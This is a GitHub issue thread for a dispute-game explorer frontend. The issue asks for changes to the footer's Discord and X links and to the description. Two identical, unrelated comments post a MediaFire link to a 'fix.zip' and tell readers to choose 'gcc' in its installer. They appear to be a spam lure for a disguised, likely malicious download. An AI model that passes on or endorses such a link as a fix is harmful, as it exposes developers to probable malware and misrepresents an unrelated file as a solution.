### ISSUE TITLE
dispute game bottom part

### ISSUE THREAD

**Issue by fearlessfe** [optimism-java/dispute-explorer-frontend#2]
1. the dc and x link
2. the description

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
